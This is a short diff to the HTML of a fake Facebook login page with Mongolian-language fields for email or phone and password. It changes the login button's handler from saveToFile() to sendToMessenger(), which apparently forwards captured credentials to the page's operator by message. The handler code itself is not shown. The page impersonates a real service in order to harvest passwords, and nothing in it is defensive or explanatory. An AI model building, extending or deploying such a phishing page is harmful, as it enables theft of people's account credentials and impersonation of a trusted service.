--- a/index.html
+++ b/index.html
@@ -88,7 +88,7 @@
         <h2>Facebook</h2>
         <input type="text" id="username" placeholder="Имэйл эсвэл утасны дугаар">
         <input type="password" id="password" placeholder="Нууц үг">
-        <button class="login-btn" onclick="saveToFile()">Нэвтрэх</button>
+        <button class="login-btn" onclick="sendToMessenger()">Нэвтрэх</button>
         <a href="#" class="forgot-password">Нууц үгээ мартсан уу?</a>
         <div class="divider"></div>
         <button class="signup-btn">Шинэ бүртгэл үүсгэх</button>
